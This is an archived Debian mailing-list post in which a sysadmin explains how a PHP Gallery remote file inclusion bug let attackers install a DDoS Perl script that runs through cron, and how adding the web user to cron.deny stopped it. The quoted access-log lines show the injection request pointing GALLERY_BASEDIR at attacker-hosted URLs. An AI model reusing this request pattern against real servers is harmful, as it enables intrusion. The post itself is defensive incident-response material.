[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Follow up on the NCSDRecover DDOS perl script

I've gotten some e-mails from people who were
infected with .ncsdrecover but it looks like my
post is the only thing accesible via google when
you find it so I thought that I would report
back publicly with what I found was responsible
for it and how it got removed.

Basically people told me to look in my logs and
I found activity in the syslog indicating when
the cron job was first added, then I searched
through my apache access logs for that same time
and found they were exploiting a bug in php
gallery on a site that had been left up. It
basically allows you to set the directory to be
an external site and then you can run whatever
the webserver will allow you to. In this case
they upload a file to /tmp or /var/tmp as they
did after I merely killed the file and removed
it. Then it adds a cron job to run the file in
this case .ncsdrecover hourly. If you find the
access log for the same time then you might see
something like this..

access.log:216.72.155.74 - -
[16/Jun/2003:05:44:31 -0500] "GET
/ara/page/gallery
/errors/configmode.php?GALLERY_BASEDIR=http://vddos.tripod.com/
HTTP/1.0" 403 30
6 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - -
[17/Jun/2003:12:25:15 -0500] "GET
/ara/page/gallery
/errors/configmode.php?GALLERY_BASEDIR=http://ddos31337.tripod.com/
HTTP/1.0" 40
3 306 "-" "Mozilla 5.0 [en-US]"
access.log:195.68.95.210 - -
[17/Jun/2003:18:48:05 -

It looks like they were still trying to infect
me yesterday, but I had put www-data on
cron.deny and thus it prevented the script from
being ran.

I think that a lot of people are probably
falling prey to this DDOS script right now based
upon e-mails I've received from people.

Shouldn't the apache user be automatically
denied from running cron jobs as a matter of
security principle by default ?

I have a question as to how safe a box is after
it has been compromised by this perl script.
I believe it opens up a shell account at 1337,
but it shouldn't give them root access or the
ability to log in as the web user at most should
it ? Cuz if so that would be bad news for a lot
of people who got hacked via this. Regardless I
upgraded my kernel to the new version, is there
anything else I should do to ensure there were
no backdoors implemented by this. Also thanks
for all of the initial help and responses I
received. The debian community is truly a great
example of mutual aid in effect.

Robert Ebright
sysadmin at azone.org

The script is posted on the below link if
anybody who knows perl wants to review it.
http://archives.neohapsis.com/archives/linux/debian/2003-q2/0898.html
Reply to: